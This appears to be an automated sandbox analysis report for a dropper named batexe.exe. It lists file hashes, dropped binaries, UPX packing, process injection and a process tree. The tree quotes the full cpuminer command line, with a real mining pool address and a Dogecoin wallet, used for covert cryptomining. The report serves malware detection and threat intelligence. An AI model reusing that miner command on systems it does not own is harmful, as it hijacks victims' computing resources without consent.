73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
304s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 00:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1524	b2e.exe
3476	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3476	cpuminer-sse2.exe
3476	cpuminer-sse2.exe
3476	cpuminer-sse2.exe
3476	cpuminer-sse2.exe
3476	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/980-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 980 wrote to memory of 1524	980	batexe.exe	73
PID 980 wrote to memory of 1524	980	batexe.exe	73
PID 980 wrote to memory of 1524	980	batexe.exe	73
PID 1524 wrote to memory of 4596	1524	b2e.exe	74
PID 1524 wrote to memory of 4596	1524	b2e.exe	74
PID 1524 wrote to memory of 4596	1524	b2e.exe	74
PID 4596 wrote to memory of 3476	4596	cmd.exe	77
PID 4596 wrote to memory of 3476	4596	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:980
- C:\Users\Admin\AppData\Local\Temp\C256.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\C256.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\C256.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C728.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C256.tmp\b2e.exe

Filesize
768KB

MD5
41acb3c7c35169437c8e50c36e39f5a5

SHA1
6b7a95c8fb404247edb7430b46e931495eeba0d1

SHA256
77003c5f07279f31ace3879feb99ce0568a05bc7bc56ecd5707bc0581cb6016a

SHA512
670b258078f3ccd9e3e710a994d95d406094dab87b4e4e11e3b312a7883631877ea896bc53150cb8b9bb8a0500df129005973212fce0541978df505edbe7d145

Download Submit
C:\Users\Admin\AppData\Local\Temp\C256.tmp\b2e.exe

Filesize
968KB

MD5
7a0e1aa19be389496af4c2d6e297d0a8

SHA1
b9f2f6ce3a8e8afd8660a41a342b322ae7236e81

SHA256
132a247b9eec735c6533d7f6e200ae3a0bc25bf8182dfa4905bd3a8564563498

SHA512
d297db104f76f8e2eee555b6b33a28f202f8cf4463769eb9281236afdcb913cb2108c4d61df58148d007ef19e30c5c67ae0b1a22aee318edbf5949c9228a7a4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\C728.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
06fc68f0132e7dbc22132c89fda88d6d

SHA1
aacdc62c8fcad0ad848c7fa228e15676e76ecf3c

SHA256
542998abe3d6a4328510fee41eabb7a7262055e917c45c80f7bd3ec059b69cbe

SHA512
a5c426d3b9d2939734a380576420e0ea5a844fe74d74db8bad5613271e8dd235b3195160407eaaa149b880d798cb9303d543981c27c1fad057574e6cb206be4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.9MB

MD5
99dc14a47f838e6bc21372219473a972

SHA1
a5320f561eff323af7e7f942e7db724547a64583

SHA256
916cd64bf0a2e4d21fbc90f49b3633e454e17b73d027a9dbf918ee9f9069a7a1

SHA512
b09a52bc2c0b1622f04177d12233bd540c172ff70920ad9be12cbfa5bee1d9902720e8152409578f301c100a613e7ef5a306946728b5ba5ec41c6a1f71c41ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.6MB

MD5
d3264f4f282df28209893e548d473ffc

SHA1
75646b3ba867651435e18ea7d0b4906ac5ea2c0c

SHA256
102e40542058f458e6763fc42c20c0fb309264b35811aa4413fa500bac107216

SHA512
3406ece504cde66cc786e3c4e9884e93d9b10c1a15cb3c25157cabfd84a49acaf481d90d4a2f18fc4a6b245efc23510961e8ae6378583bb3e126e2c653ae1bca

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
25e9da23faa394480037865b60df60bf

SHA1
4bf212e9da66ce963e3db20752e01b7fb70cd21e

SHA256
3671391fca98cbe2f3da5dddd3a9e2aa899ee5d6f422ffcc960dd3ea84a01ea2

SHA512
4646720952c0aac527b321bd45cea28bdb43e45a7555cddd04252f849328ec53b17c1edf318430e70b8e8afd3ebd18fdd0332eb28b8250fdc545c28ef11d8a53

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
0fd59d26882b0fc181849312643433f8

SHA1
16af5ffdc7bd1828ff158a5f0c67944dfc781dc8

SHA256
d1009930deb5cc75cc758d0f80d6c266cc3ea487c7f856ceacb7e7e55cb0bed1

SHA512
f7ddb389e7e23015d0ddef4f80c54faf1262ecee1705d403bef03066bcf5623b668ec381d2183713b303c5692d7e890203783dad6d6777da3eae0a24a0f2343b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
f824d99ba1951f2ae04477c56703679e

SHA1
542ad772788dc42bcf2c53377a079e97e6b5228b

SHA256
3a087f7d4238149feb05854436fbd08d59a3105aac6afbdf386de70e12470894

SHA512
e40e914dff85033b6ebf847e857a23b5bce300bbd49feae27fd56fb8a7a8a6cc0ffab6749715aa5fdace825379700efec63fb31e6c698c2ea6b444a69154b717

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/980-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1524-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1524-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3476-43-0x000000006C310000-0x000000006C3A8000-memory.dmp

Filesize
608KB

Download
memory/3476-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3476-44-0x00000000010E0000-0x0000000002995000-memory.dmp

Filesize
24.7MB

Download
memory/3476-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3476-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3476-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3476-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download